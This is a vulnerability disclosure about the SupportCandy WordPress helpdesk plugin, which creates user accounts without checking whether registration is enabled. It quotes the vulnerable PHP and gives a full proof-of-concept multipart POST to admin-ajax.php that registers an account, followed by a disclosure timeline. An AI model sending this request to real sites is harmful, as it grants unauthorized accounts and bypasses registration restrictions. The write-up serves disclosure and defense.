Vulnerable Versions: All versions before May 2020
SupportCandy is a WordPress plugin that allows a WordPress site to have a helpdesk and support ticketing system. I found a vulnerability that allows anyone to create a wordpress account even if registration is disabled in WordPress and SupportCandy.
If registration is disabled and this plugin is activated, anyone can create an account. The user will obtain the user role that is set within the WordPress general settings. Also, this vulnerability allows users to bypass registration whitelisting restrictions where only specific emails are allowed to register (Wordfence security feature).
wp_create_user() WordPress Function
wp_create_user() is a WordPress function that allows plugin developers to directly insert users into a WordPress user database.
wp_create_user( string $username, string $password, string $email = '' ): int|WP_Error
Now that you know what wp_create_user() does. SupportCandy uses this function to register new users. Their code does not check if registrations are disabled in WordPress or within their own plugin.
Lines 48-54 of SupportCandy’s includes\admin\tickets\sign_in\submit_user.php:
$response=array();
if ( email_exists($email) ) {
$response['error'] = '1';
} else if( username_exists($username) ){
$response['error'] = '2';
}else {
$user_id = wp_create_user($username,$password,$email);SupportCandy only checked if an email or username existed in the HTTP POST request, but it does not verify if registration is enabled before inserting new users into the database.
Create a user with a HTTP POST
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybeCmA9uq5965NgRq
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="firstname"
FirstName-changethis
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="lastname"
LastName-changethis
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="username"
Username-changethis
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="email"
email-changethis
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="password"
password-changethis
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="confirmpassword"
confirmPassword-changethis
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="action"
wpsc_tickets
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="setting_action"
submit_user
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="captcha_code"
------WebKitFormBoundarybeCmA9uq5965NgRq--Timeline
- April 27, 2020 – Disclosed to SupportCandy
- April 28, 2020 – SupportCandy acknowledged the issue and mentioned it would be fixed in their next release.
